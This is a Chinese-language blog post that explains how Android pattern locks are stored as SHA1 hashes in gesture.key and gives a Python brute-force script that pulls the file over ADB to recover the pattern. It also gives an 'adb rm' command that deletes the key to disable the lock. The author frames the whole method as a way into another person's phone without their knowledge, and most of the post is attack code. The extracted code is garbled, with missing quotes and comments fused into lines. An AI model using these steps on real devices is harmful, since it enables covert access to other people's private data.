安卓手機的圖形鎖（九宮格）是3x3的點(diǎn)陣，按次序連接數個(gè)點(diǎn)從而達到鎖定/解鎖的功能。最少需要連接4個(gè)點(diǎn)，最多能連接9個(gè)點(diǎn)。網(wǎng)上也有暴力刪除手機圖形鎖的方法，即直接干掉圖形鎖功能。但假如你想進(jìn)入別人的手機，但又不想引起其警覺(jué)的話(huà)

前提條件：手機需要root，而且打開(kāi)調試模式。一般來(lái)講，如果用過(guò)諸如豌豆莢手機助手、360手機助手一類(lèi)的軟件，都會(huì )被要求打開(kāi)調試模式的。如果要刪除手機內置軟件，則需要將手機root。

原理分析

首先科普一下，安卓手機是如何標記這9個(gè)點(diǎn)的。通過(guò)閱讀安卓系統源碼可知，每個(gè)點(diǎn)都有其編號，組成了一個(gè)3x3的矩陣，形如：

00 01 02

03 04 05

06 07 08

假如設定解鎖圖形為一個(gè)L形，如圖：

那么這幾個(gè)點(diǎn)的排列順序是這樣的：00 03 06 07 08。系統就記下來(lái)了這一串數字，然后將這一串數字(以十六進(jìn)制的方式)進(jìn)行SHA1加密，存儲在了手機里的/data/system/gesture.key 文件中。我們用數據線(xiàn)連接手機和電腦，然后ADB連接手機，將文件下載到電腦上（命令：adb pull /data/system/gesture.key gesture.key），如圖：

用WinHex等十六進(jìn)制編輯程序打開(kāi)gesture.key，會(huì )發(fā)現文件內是SHA1加密過(guò)的字符串：c8c0b24a15dc8bbfd411427973574695230458f0，如圖：

當你下次解鎖的時(shí)候，系統就對比你畫(huà)的圖案，看對應的數字串是不是0003060708對應的加密結果。如果是，就解鎖；不是就繼續保持鎖定。那么，如果窮舉所有的數字串排列，會(huì )有多少呢？聯(lián)想到高中的階乘，如果用4個(gè)點(diǎn)做解鎖圖形的話(huà)，就是9x8x7x6=3024種可能性，那5個(gè)點(diǎn)就是15120，6個(gè)點(diǎn)的話(huà)60480，7個(gè)點(diǎn)181440，8個(gè)點(diǎn)362880，9個(gè)點(diǎn)362880?？偣彩?85824種可能性（但這么計算并不嚴密，因為同一條直線(xiàn)上的點(diǎn)只能和他們相鄰的點(diǎn)相連）。

滿(mǎn)打滿(mǎn)算，也不到985824種可能性。乍一看很大，但在計算機面前，窮舉出來(lái)這些東西用不了幾秒鐘。

破解過(guò)程

知道了原理，就著(zhù)手寫(xiě)程序來(lái)實(shí)現吧。這里使用了Python來(lái)完成任務(wù)。主要應用了hashlib模塊（對字符串進(jìn)行SHA1加密）和itertools模塊（Python內置，生成00-09的排列組合）。

主要流程為：

1.ADB連接手機，獲取gesture.key文件

2.讀取key文件，存入字符串str_A

3.生成全部可能的數字串

4.對這些數字串進(jìn)行加密，得到字符串str_B

5.將字符串str_A與str_B進(jìn)行對比

6.如果字符串A，B相同，則說(shuō)明數字串num就是想要的解鎖順序

7.打印出數字串num

下面為程序：

-*- coding: cp936 -*-

import itertools

import hashlib

import time

import os

調用cmd，ADB連接到手機,讀取SHA1加密后的字符串

os.system("adb pull /data/system/gesture.key gesture.key")

time.sleep(5)

f=open(gesture.key,r)

pswd=f.readline()

f.close()

pswd_hex=pswd.encode(hex)

print 加密后的密碼為：%s%pswd_hex

生成解鎖序列，得到[00,01,02,03,04,05,06,07,08]

matrix=[]

for i in range(0,9):

str_temp = 0+str(i)

matrix.append(str_temp)

將00——08的字符進(jìn)行排列，至少取4個(gè)數排列，最多全部進(jìn)行排列

min_num=4

max_num=len(matrix)

for num in range(min_num,max_num+1):從04 -> 08

iter1 = itertools.permutations(matrix,num)從9個(gè)數字中挑出n個(gè)進(jìn)行排列

list_m=[]

list_m.append(list(iter1))將生成的排列全部存放到 list_m 列表中

for el in list_m[0]:遍歷這n個(gè)數字的全部排列

strlist=.join(el)將list轉換成str。[00,03,06,07,08]-->0003060708

strlist_sha1 = hashlib.sha1(strlist.decode(hex)).hexdigest()將字符串進(jìn)行SHA1加密

if pswd_hex==strlist_sha1:將手機文件里的字符串與加密字符串進(jìn)行對比

print 解鎖密碼為：,strlist

從程序本身來(lái)說(shuō)，得到解鎖密碼后應該用break跳出循環(huán)并終止程序運行。但Python并沒(méi)有跳出多重循環(huán)的語(yǔ)句，如果要跳出多重循環(huán)，只能設置標志位然后不停進(jìn)行判定。為了運行速度就略去了跳出循環(huán)這個(gè)步驟。(有沒(méi)有更好的實(shí)現跳出多重循環(huán)的方法？)另外也略去了很多容錯語(yǔ)句。從破解目的來(lái)說(shuō)，如果單單是忘記了自己的手機圖形鎖密碼，完全可以用更簡(jiǎn)單的辦法：ADB連接手機，然后adb rm /data/system/gesture.key刪除掉gesture.key文件，此時(shí)圖形鎖就失效了，隨意畫(huà)一下就能解鎖。但本文開(kāi)篇假設的是為了不被察覺(jué)地進(jìn)入到別人的手機里，所以就有了這篇文章。

最后提一個(gè)安全小建議：如果手機已root，還要用XX手機助手，還想設置圖形鎖的話(huà)——在手機設置選項里，有一個(gè)鎖定狀態(tài)下取消USB調試模式(這個(gè)名字因手機而異，而且有的有此選項，有的手機就沒(méi)有)，開(kāi)啟此功能之后，在手機鎖定狀態(tài)下就能夠防范此類(lèi)攻擊了。此文技術(shù)原理很簡(jiǎn)單，還望各位大大傳授些高大上的Python編程技巧。

一切事故，本文概不負責，僅供參考

關(guān)注何天，只分享干貨